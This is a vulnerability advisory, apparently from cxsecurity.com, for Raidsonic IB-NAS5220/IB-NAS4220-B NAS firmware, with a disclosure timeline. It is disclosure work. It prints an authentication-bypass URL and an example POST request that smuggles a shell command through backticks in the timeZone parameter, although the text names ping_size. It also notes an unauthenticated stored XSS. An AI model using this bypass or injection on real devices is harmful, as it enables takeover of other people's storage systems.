Raidsonic IB-NAS5220 / IB-NAS4220-B XSS / Authentication Bypass

2013-02-15 / 2013-09-24
Credit: Michael Messner
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

Device Name: IB-NAS5220 / IB-NAS4220-B Vendor: Raidsonic ============ Vulnerable Firmware Releases: ============ Product Name IB-NAS5220 / IB-NAS4220-B Tested Firmware IB5220: 2.6.3-20100206S Tested Firmware IB4220: 2.6.3.IB.1.RS.1 Firmware Download: http://www.raidsonic.de/data/Downloads/Firmware/IB-NAS5220_standard.zip ============ Vulnerability Overview: ============ * Authentication Bypass: -> Access the following URL to bypass the login procedure: http://<IP>/nav.cgi?foldName=adm&localePreference=en * Stored XSS: System -> Time Settings -> NTP Server -> User Define Injecting scripts into the parameter ntp_name reveals that this parameter is not properly validated for malicious input. You are able to place this script without authentication. Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/ICY-Box-Stored-XSS.png * Unauthenticated OS Command Injection The vulnerability is caused by missing input validation in the ping_size parameter and can be exploited to inject and execute arbitrary shell commands. Example Exploit: POST /cgi/time/timeHandler.cgi HTTP/1.1 Host: 192.168.178.41 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Referer: http://192.168.178.41/cgi/time/time.cgi Content-Type: application/x-www-form-urlencoded Content-Length: 186 month=1&date=1&year=2007&hour=12&minute=10&m=PM&timeZone=Amsterdam`COMMAND`&ntp_type=default&ntpServer=none&old_date=+1+12007&old_time=1210&old_timeZone=Amsterdam&renew=0 Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/Raidsonic-IB-NAS-command-execution.png ============ Solution ============ No known solution available. ============ Credits ============ The vulnerability was discovered by Michael Messner Mail: devnull#at#s3cur1ty#dot#de Web: http://www.s3cur1ty.de Advisory URL: http://www.s3cur1ty.de/m1adv2013-010 Twitter: @s3cur1ty_de ============ Time Line: ============ August 2012 - discovered vulnerability 27.08.2012 - contacted vendor with vulnerability details for IB-NAS4220-B 28.08.2012 - vendor responded that they will not publish an update 15.10.2012 - contacted vendor with vulnerability details for IB-NAS5220 15.10.2012 - vendor responded that they will not publish an update 12.02.2013 - public release ===================== Advisory end =====================

References:

http://www.raidsonic.de/data/Downloads/Firmware/IB-NAS5220_standard.zip
http://cxsecurity.com/issue/WLB-2013090163


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top